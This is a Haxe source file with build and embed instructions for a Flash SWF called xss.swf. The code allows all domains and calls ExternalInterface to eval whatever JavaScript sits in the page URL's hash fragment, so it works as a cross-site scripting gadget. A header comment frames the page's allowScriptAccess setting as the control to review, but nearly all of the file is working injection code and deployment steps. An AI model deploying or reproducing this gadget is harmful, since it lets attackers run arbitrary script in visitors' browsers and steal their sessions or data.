4 // This Haxe source file builds a SWF that injects JavaScript into the page that embeds it; the call into the page only works because the embed below grants allowScriptAccess="always", so that setting is the control a page owner should review.
7 // 1. Acquire the latest stable version of haxe from http://haxe.org/download
8 // Note: to run Haxe, you may also need Neko (http://nekovm.org/download)
9 // 2. Create a file called xss.hx with these contents.
10 // 3. Create a file called compile.hxml with the following content:
14 // 4. From the command line, execute:
18 // 1. Take xss.swf generated by haxe and deploy it to your webserver.
19 // 2. Embed it into your HTML file with code like the following:
21 // id="xss" class="hidden"
22 // classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
23 // codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
24 // <param name="movie" value="xss.swf" />
25 // <param name="allowScriptAccess" value="always" />
29 // allowScriptAccess="always"
30 // type="application/x-shockwave-flash"
31 // pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">
36 import flash.external.ExternalInterface;
40 public static function main() {
41 flash.system.Security.allowDomain("*");
42 ExternalInterface.call( [ "(function(){setTimeout(\"",
43 "eval(document.location.hash.slice(1))",
44 "\",0);})" ].join('') );